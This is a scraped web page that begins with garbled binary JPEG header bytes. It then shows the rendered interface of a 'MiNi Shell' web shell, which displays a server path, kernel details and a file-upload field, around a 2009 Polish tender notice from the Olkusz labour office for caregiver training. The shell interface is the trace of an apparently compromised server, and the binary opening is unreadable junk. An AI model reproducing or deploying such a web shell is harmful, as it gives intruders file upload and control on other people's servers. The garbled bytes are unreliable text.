JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090907/306998-N-2009.html

<p class="kh_header"><b>Olkusz: Zorganizowanie i przeprowadzenie usługi szkolenia w zakresie Opiekunka domowa osób starszych i niepełnosprawnych dla 15 osób w jednej 15-to osobowej grupie, w ramach Priorytetu VI  Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego  w ramach PO KL Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie  poziomu aktywności zawodowej osób  bezrobotnych.</b><br>
<b>Numer ogłoszenia: 306998 - 2009; data zamieszczenia: 07.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Minkiewicza 2, 32-300 Olkusz, woj. małopolskie, tel. 032 6434348, faks 032 6430538.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.olkusz.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie usługi szkolenia w zakresie Opiekunka domowa osób starszych i niepełnosprawnych dla 15 osób w jednej 15-to osobowej grupie, w ramach Priorytetu VI  Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego  w ramach PO KL Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie  poziomu aktywności zawodowej osób  bezrobotnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zorganizowanie i przeprowadzenie usługi szkolenia w zakresie Opiekunka domowa osób starszych i niepełnosprawnych dla 15 osób w jednej 15-to osobowej grupie, w ramach Priorytetu VI  Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego  w ramach PO KL Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie  poziomu aktywności zawodowej osób  bezrobotnych. 
1.1. Zamówienie ma być przeprowadzone zgodnie  z programem szkolenia, który powinien uwzględniać  zróżnicowany poziom  umiejętności  i wiedzy uczestników kursu.
1.2.  Program szkolenia powinien uwzględniać wiadomości zgodne z wymogami rynku pracy i  być zgodny z obowiązującymi aktami prawnymi. Program szkolenia powinien być tak skonstruowany aby zapewnić jak najwyższą jakość szkolenia oraz profesjonalne przygotowanie uczestników. 
1.3.   Program powinien być opracowany  w oparciu o Rozporządzenie  Ministra Edukacji  i  Nauki w sprawie uzyskiwania  i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych- ( Dz. U. Nr 31, poz. 216 z późniejszymi zmianami ) oraz o Rozporządzenie Ministra Pracy i Polityki Społecznej z dnia   02.03.2007r.  w sprawie szczegółowych warunków prowadzenia  przez  publiczne służby zatrudnienia usług rynku pracy ( Dz. U. Nr 47, poz. 315 ) powinien zawierać  w szczególności:
a)nazwę i zakres szkolenia,
b)czas trwania i sposób organizacji szkolenia,
c)wymagania wstępne  dla uczestników szkolenia,
d)cele szkolenia,
e)plan nauczania  określający  tematy  zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i części praktycznej,
f)treści  szkolenia  w zakresie poszczególnych zajęć edukacyjnych,
g)wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
h)sposób sprawdzania efektów szkolenia.
1.4.   Program szkolenia  musi zawierać modułowy program  szkolenia  dla zawodu - opiekunka domowa nad osobą starszą i niepełnosprawną  ( kod zawodu: 5133.01 ) z następującymi jednostkami modułowymi:
1)wykonywanie  codziennych  czynności  z zakresu  gospodarstwa domowego,
2)wykonywanie  czynności  higienicznych przy podopiecznym,
3)wykonywanie biologicznych funkcji życiowych   podopiecznego,
4)organizowanie czasu podopiecznemu  i dotrzymywanie  towarzystwa.

Każda  jednostka modułowa musi zawierać  wszystkie  jednostki szkoleniowe zgodne z modułowym programem szkolenia dostępnym na stronie    
www.standardyiszkolenia.praca.gov.pl
1.5.  Zamówienie ma być przeprowadzone zgodnie  z programem szkolenia, który powinien zawierać  co  najmniej 180  godzin, w tym na zakończenie  każdej jednostki szkoleniowej Wykonawca przeprowadzi  zaplanowany  sprawdzian postępów.
Przyjmuje się, że:
-  jedna godzina zajęć teoretycznych równa się 60 minutom i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą 15 minut,
-  jedna godzina zajęć z praktycznych równa się 60 minutom bez przerwy.
1.6. Celem szkolenia jest przygotowanie praktyczne i teoretyczne do samodzielnej opieki w domu nad  podopiecznym. 
 Zakłada się, że po zakończonym  procesie kształcenia absolwent szkolenia  będzie potrafił w szczególności:
 - zorganizować całodzienną opiekę  dla starszej lub niepełnosprawnej osoby,
 - wykonać podstawowe czynności związane z funkcjonowaniem  gospodarstwa domowego podopiecznego,
-  przygotować posiłki według  ogólnych lub specjalnych zasad żywienia,
-  wspomagać  podopiecznego  w pokonywaniu trudności życiowych, z uwzględnieniem odpowiedzialności  cywilnej i zasad etyczno - moralnych,
-  udzielić pierwszej pomocy  w sytuacji  zagrożenia życia lub czasowej  niedyspozycji.
1.7. Szkolenie musi odbywać się  w dni robocze.
1.8. Wymaga się, aby program szkolenia  uwzględniał przerwy w  trakcie realizacji zajęć.
1.9. Zajęcia teoretyczne oraz praktyczne  muszą odbywać się w pomieszczeniu/ach dostosowanym/ych do prowadzenia zajęć  szkoleniowych i odpowiednio w tym celu  wyposażonym/ych  tj. w pomieszczeniu/ach posiadającym/ych odpowiednie warunki  sanitarne, bezpieczeństwa,  akustyczne i jakościowe, odpowiednio  wyposażonym/ych w sprzęt  i pomoce dydaktyczne  umożliwiające  prawidłową realizację kształcenia.   
1.10. Wykonawca  podczas trwania szkolenia  zapewni prawidłowe  warunki pracy  zgodne z przepisami BHP i p. poż.
1.11.Wymaga się prowadzenia dokumentacji przebiegu szkolenia stanowiącej:
a)dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin  i tematy zajęć edukacyjnych,
b)protokoły ze sprawdzianów  przeprowadzanych na zakończenie każdej jednostki szkoleniowej,
c)rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
1.12. Na jednego  uczestnika  musi przypadać  jedno stanowisko  szkoleniowe.
1.13. Szkolenia powinny być przeprowadzone przez doświadczoną i wykwalifikowaną kadrę, posiadającą odpowiednie wykształcenie i doświadczenie zawodowe.
1.14. Każdemu z uczestników szkolenia powinny być przekazane nieodpłatnie materiały biurowe i szkoleniowe typu:
a)zeszyt,
b)długopis,
c)skrypt lub podręcznik,
d)materiały do ćwiczeń.

Materiały szkoleniowe przekazywane  uczestnikom szkolenia powinny być adekwatne do treści szkolenia. Materiały wykorzystywane podczas realizacji szkolenia powinny być przekazywane uczestnikom szkolenia na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć.
Materiały biurowe i szkoleniowe opracowane przez wykładowców powinny zawierać logo EFS i Unii Europejskiej  oraz logo PO KL zgodnie z zasadą wizualizacji, a także informacje:       
Szkolenie: Opiekunka domowa osób starszych i niepełnosprawnych w ramach Priorytetu VI Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego  w ramach PO KL Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz  podnoszenie poziomu aktywności  zawodowej osób bezrobotnych.  

   Logo EFS i PO KL do pobrania ze strony internetowej: 
  www.pup.olkusz.info.pl/logo_efs.jpg
  www.pup.olkusz.info.pl/logo_pokl.jpg

1.15. Uczestnicy szkolenia powinni być objęci opieką z ramienia instytucji szkoleniowej. Każde szkolenie powinno mieć swojego opiekuna, osobę odpowiedzialną za organizację i realizację szkolenia, wskazaną do kontaktu w umowie  stanowiącej załącznik nr 7a  do SIWZ.
1.16.    Po zakończonym  szkoleniu  Wykonawca zobowiązany jest do   wydania   uczestnikom szkolenia dokumentu końcowego  zgodnego z załącznikiem  do  Rozporządzenia Ministra Edukacji i Nauki  z dnia 03.02.2006r.  w sprawie uzyskiwania i uzupełniania przez osoby dorosłe  wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216 ) oraz    zaświadczenia o  ukończeniu szkolenia zawierające logo  EFS i Unii Europejskiej  oraz logo PO KL zgodnie  z zasadą wizualizacji, a także informacje: Szkolenie: Opiekunka domowa osób starszych i niepełnosprawnych w ramach  Priorytetu VI  Rynek  pracy otwarty dla wszystkich współfinansowanego z Europejskiego  Funduszu Społecznego w ramach PO KL  Poddziałanie  6.1.3 Poprawa    
zdolności do  zatrudnienia oraz podnoszenie  poziomu aktywności  zawodowej osób bezrobotnych.
      
Logo EFS i PO KL do pobrania ze strony internetowej: 
      www.pup.olkusz.info.pl/logo_efs.jpg
      www.pup.olkusz.info.pl/logo_pokl.jpg.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:

1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności objętych przedmiotem postępowania tj.posiadają aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej (np. wpis do ewidencji działalności    
gospodarczej, wpis do KRS,), 
-  posiadają aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez właściwy  Wojewódzki Urząd Pracy; zgodnie z art. 20  ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity Dz. U. z 2008r. Nr 69 poz. 415 z późn.zm.) instytucja szkoleniowa oferująca szkolenia dla bezrobotnych i poszukujących pracy może uzyskać zlecenie finansowane ze środków publicznych na prowadzenie tych szkoleń po wpisie do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze     
względu na siedzibę  instytucji szkoleniowej.
1.2. posiadają niezbędną wiedzę i doświadczenie: w postępowaniu może wziąć udział Wykonawca, który wykaże się przeprowadzeniem z należytą starannością, co najmniej  jednego szkolenia  w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia  działalności jest krótszy  -   w tym okresie -  o tematyce  tożsamej                 
z przedmiotem zamówienia tzn. należy uwzględnić szkolenia:
- Opiekunka domowa osób  starszych i niepełnosprawnych,
- Opiekunka domowa osób starszych,
- Opiekunka domowa osób niepełnosprawnych,
uwzględniane będą również kursy :  Opiekunka domowa osób  starszych i niepełnosprawnych,Opiekunka domowa osób starszych, Opiekunka domowa osób    niepełnosprawnych zawierające moduł języka obcego.
1.3. dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, z których każda musi posiadać co najmniej:

a)świadectwo, dyplom lub zaświadczenie ukończenia medycznej szkoły  średniej lub policealnej o kierunku pielęgniarskim lub pokrewnym, wyższych studiów pielęgniarskich albo szkoły  policealnej w zawodzie opiekunka środowiskowa, asystent  osoby niepełnosprawnej, opiekun w domu pomocy społecznej  lub kurs medyczny uprawniający do świadczenia specjalistycznych usług opiekuńczych, 
b)ukończony kurs pedagogiczny, studium  pedagogiczne, studia pedagogiczne lub inny dokument uprawniający do prowadzenia zajęć.
1.4. dysponują potencjałem technicznym umożliwiającym  realizację przedmiotu zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego umożliwiającego realizację przedmiotu zamówienia. 
1.5. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.6. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust. 1 i  2 w/w ustawy,
1.7. w postępowaniu może wziąć udział Wykonawca, który zagwarantuje zorganizowanie szkolenia,w granicach administracyjnych Miasta Olkusza

Zamawiający wyklucza możliwość prowadzenia szkolenia metodą  e- learning.

W przypadku ubiegania się wspólnie przez Wykonawców o udzielenie zamówienia:
-Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie  zamówienia publicznego,
- Warunki udziału w postępowaniu określone w pkt 5.1.1, 5.1.6, 5.1.7. SIWZ powinien spełniać każdy  Wykonawca z osobna, 
- Warunki udziału w postępowaniu określone w pkt  5.1.2, 5.1.3 ,5.1.4, 5.1.5.SIWZ Wykonawcy mogą spełniać łącznie. 
 Ocena spełniania warunków udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia potwierdzające ich spełnienie zgodnie z formułą spełnia / nie spełnia. Nie spełnianie jakiegokolwiek z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z  dnia 29 stycznia 2004r. Prawo zamówień publicznych:
1.1. Oświadczenie Wykonawcy o spełnieniu warunków określonych w  art. 22 ust.1 i nie podleganiu wykluczeniu z art. 24 ust.1 i 2  ustawy Prawo  zamówień publicznych  stanowiące załącznik nr 3 do SIWZ, przedstawione w formie oryginału i podpisane przez Wykonawcę lub osobę upoważnioną do podpisania oferty.
1.2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej (np. wpis do ewidencji   działalności gospodarczej, wpis do KRS, ). Dokument powinien być przedstawiony w formie kserokopii poświadczonej za  zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do podpisania oferty.
Odpis lub zaświadczenie powinno być wystawione nie wcześniej  niż 6 miesięcy  przed upływem terminu składania ofert.             
1.3. Wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ustawy  z dnia 20  kwietnia 2004r.o promocji zatrudnienia i instytucjach rynku pracy i  Rozporządzeniem MG i P  z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych.  
 Instytucje szkoleniowe, które dokonały wpisu przed 2009r. winny złożyć zaświadczenie  potwierdzające kontynuację  działalności szkoleniowej w roku bieżącym lub oświadczenie potwierdzające kontynuację działalności szkoleniowej w bieżącym roku. 
Wpis do rejestru lub zaświadczenie  potwierdzające kontynuację  działalności szkoleniowej  powinny być przedstawione w formie kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę  lub osobę upoważnioną do podpisania oferty.
Oświadczenie potwierdzające kontynuację działalności szkoleniowej w bieżącym roku powinno być przedstawione w formie oryginału i podpisane przez Wykonawcę  lub osobę upoważnioną do podpisania oferty.
2.  W przypadku  Wykonawców wspólnie ubiegających się o udzielenie zamówienia 
(np. wspólnicy spółki cywilnej lub członkowie konsorcjum ) należy złożyć następujące dokumenty :
2.1. Pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zawierające umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i do zawarcia umowy.   
Pełnomocnictwo powinno być  złożone w oryginale  lub w formie kserokopii potwierdzonej notarialnie.
2.2. Dokumenty, o którym mowa w punkcie 6.1.1., 6.1.2. i  6.1.3   SIWZ  składane dla każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3.W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem      
technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć: 
3.1. Wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował Wykonawca i które  będą uczestniczyć w wykonywaniu zamówienia na załączniku nr 5 do SIWZ.    
Wykaz powinien zawierać informacje na temat wykształcenia, posiadania uprawnień pedagogicznych w/w osób i podmiotów, a także zakresu wykonywanych przez nie czynności w niniejszym zamówieniu. 
Kadra uczestnicząca  w wykonaniu zamówienia  musi  spełniać wymagania,  o których mowa  w pkt  5.1.3  SIWZ. Ponadto należy złożyć  CV wykładowców oraz ksero dokumentów potwierdzających posiadanie uprawnień pedagogicznych.
Nie należy przedstawiać listy wszystkich wykładowców zatrudnionych przez Wykonawcę, tylko wykładowców przewidzianych do realizacji szkolenia będącego przedmiotem zamówienia.

Jeżeli Wykonawca  wskaże osoby, którymi będzie dysponował zobowiązany jest złożyć  pisemne zobowiązanie  innych podmiotów  do udostępnienia  osób zdolnych do wykonania  zamówienia.


3.2. Wykaz niezbędnych do wykonania zamówienia narzędzi, urządzeń i sprzętu, którymi dysponuje lub będzie dysponował  Wykonawca - załącznik nr 11 do SIWZ.
Jeżeli Wykonawca  wskaże urządzenia i sprzęty , którymi będzie dysponował zobowiązany jest złożyć  pisemne zobowiązanie  innych podmiotów  do udostępnienia  niezbędnych  do wykonania  zamówienia urządzeń i sprzętu.
Nie należy  wymieniać narzędzi, urządzeń  i sprzętu, który nie  ma  bezpośredniego związku z realizacją zamówienia, a znajduje się, bądź będzie się znajdował na wyposażeniu bazy lokalowej.
3.3. Załącznik nr 6 do SIWZ - wykaz wykonanych szkoleń w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia działalności jest krótszy  -   w tym okresie -  o tematyce  tożsamej z  przedmiotem zamówienia tzn. należy uwzględnić szkolenia: 
-Opiekunka domowa osób  starszych i niepełnosprawnych,
-Opiekunka domowa osób starszych,
-Opiekunka domowa osób niepełnosprawnych,
uwzględniane będą również kursy :Opiekunka domowa osób starszych  i niepełnosprawnych,Opiekunka domowa osób starszych, Opiekunka domowa osób    niepełnosprawnych zawierające moduł języka obcego.

 Ponadto należy dołączyć  dokumenty potwierdzające , że usługi zostały wykonane należycie np. referencje, pochwały itp. ( z wyłączeniem  dokumentów wystawionych Wykonawcy  przez Zamawiającego tj. PUP Olkusz) w oryginale lub w formie kserokopii potwierdzonych za  zgodność z oryginałem podpisanych przez  osobę uprawnianą.				                       	
 Należy dołączyć  dokumenty poświadczające należyte wykonanie  zamówień od co najmniej   jednego  Zamawiającego, u którego Wykonawca  realizował zamówienia( z wyłączeniem      dokumentów  wystawionych Wykonawcy  przez  Zamawiającego tj. PUP Olkusz).
4.  W celu potwierdzenia, że Wykonawca  znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć:
4.1. Pisemne oświadczenie o nie zaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne stanowiące załącznik nr 8 do SIWZ, przedstawione w formie oryginału i podpisane przez Wykonawcę lub inną osobę upoważnioną do podpisania oferty. Zamawiający może żądać na wniosek okazania w/ w dokumentów w ciągu 14 dni. W przypadku zażądania przez Zamawiającego w/ w dokumentów winny one być  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.    
 5. Pisemne oświadczenie o zagwarantowaniu zorganizowania szkolenia w granicach administracyjnych  Miasta Olkusza, stanowiące załącznik nr 9 do SIWZ,  przedstawione w formie oryginału i podpisane przez Wykonawcę lub inną osobę upoważnioną do podpisania oferty.
6. W przypadku kiedy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej należy złożyć:
6.1. Zamiast dokumentów, o którym mowa w pkt 6.1.2.SIWZ -  dokument lub dokumenty,wystawione  w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego  likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem  terminu składania ofert.

6.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Daty wystawienia stosuje się odpowiednio.
6.3. Jeżeli dokumenty wyżej wymienione Wykonawca składa  w języku obcym, należy również  złożyć  tłumaczenie na język polski, poświadczone przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - doświadczenie - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pup.olkusz.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urzad Pracy w Olkuszu
ul. Minkiewicza 2
32 - 300 Olkusz
pokój nr 8  - Poziom górny.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2009 godzina 10:00, miejsce: Powiatowy Urzad Pracy w Olkuszu
ul. Minkiewicza 2
32 - 300 Olkusz
pokój nr 8  - Poziom górny.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com